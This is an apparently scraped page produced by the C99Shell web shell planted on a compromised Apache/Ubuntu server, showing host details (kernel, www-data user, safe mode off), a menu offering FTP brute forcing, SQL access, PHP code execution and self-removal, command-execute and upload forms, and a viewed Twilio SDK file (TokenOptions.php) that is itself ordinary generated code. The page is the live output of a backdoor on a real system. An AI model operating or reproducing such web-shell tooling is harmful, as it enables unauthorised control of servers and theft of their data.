!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/twilio/sdk/src/Twilio/Rest/Oauth/V1/   drwxr-xr-x
Free 12.98 GB of 57.97 GB (22.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     TokenOptions.php (4.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Oauth\V1;

use 
Twilio\Options;
use 
Twilio\Values;

abstract class 
TokenOptions {
    
/**
     * @param string $clientSecret The credential for confidential OAuth App
     * @param string $code Jwt token
     * @param string $codeVerifier The cryptographically generated code
     * @param string $deviceCode Jwt token
     * @param string $refreshToken Jwt token
     * @param string $deviceId An Id of device
     * @return CreateTokenOptions Options builder
     */
    
public static function create(string $clientSecret Values::NONEstring $code Values::NONEstring $codeVerifier Values::NONEstring $deviceCode Values::NONEstring $refreshToken Values::NONEstring $deviceId Values::NONE): CreateTokenOptions {
        return new 
CreateTokenOptions($clientSecret$code$codeVerifier$deviceCode$refreshToken$deviceId);
    }
}

class 
CreateTokenOptions extends Options {
    
/**
     * @param string $clientSecret The credential for confidential OAuth App
     * @param string $code Jwt token
     * @param string $codeVerifier The cryptographically generated code
     * @param string $deviceCode Jwt token
     * @param string $refreshToken Jwt token
     * @param string $deviceId An Id of device
     */
    
public function __construct(string $clientSecret Values::NONEstring $code Values::NONEstring $codeVerifier Values::NONEstring $deviceCode Values::NONEstring $refreshToken Values::NONEstring $deviceId Values::NONE) {
        
$this->options['clientSecret'] = $clientSecret;
        
$this->options['code'] = $code;
        
$this->options['codeVerifier'] = $codeVerifier;
        
$this->options['deviceCode'] = $deviceCode;
        
$this->options['refreshToken'] = $refreshToken;
        
$this->options['deviceId'] = $deviceId;
    }

    
/**
     * The credential for confidential OAuth App.
     *
     * @param string $clientSecret The credential for confidential OAuth App
     * @return $this Fluent Builder
     */
    
public function setClientSecret(string $clientSecret): self {
        
$this->options['clientSecret'] = $clientSecret;
        return 
$this;
    }

    
/**
     * JWT token related to the authorization code grant type.
     *
     * @param string $code Jwt token
     * @return $this Fluent Builder
     */
    
public function setCode(string $code): self {
        
$this->options['code'] = $code;
        return 
$this;
    }

    
/**
     * A code which is generation cryptographically.
     *
     * @param string $codeVerifier The cryptographically generated code
     * @return $this Fluent Builder
     */
    
public function setCodeVerifier(string $codeVerifier): self {
        
$this->options['codeVerifier'] = $codeVerifier;
        return 
$this;
    }

    
/**
     * JWT token related to the device code grant type.
     *
     * @param string $deviceCode Jwt token
     * @return $this Fluent Builder
     */
    
public function setDeviceCode(string $deviceCode): self {
        
$this->options['deviceCode'] = $deviceCode;
        return 
$this;
    }

    
/**
     * JWT token related to the refresh token grant type.
     *
     * @param string $refreshToken Jwt token
     * @return $this Fluent Builder
     */
    
public function setRefreshToken(string $refreshToken): self {
        
$this->options['refreshToken'] = $refreshToken;
        return 
$this;
    }

    
/**
     * The Id of the device associated with the token (refresh token).
     *
     * @param string $deviceId An Id of device
     * @return $this Fluent Builder
     */
    
public function setDeviceId(string $deviceId): self {
        
$this->options['deviceId'] = $deviceId;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Oauth.V1.CreateTokenOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--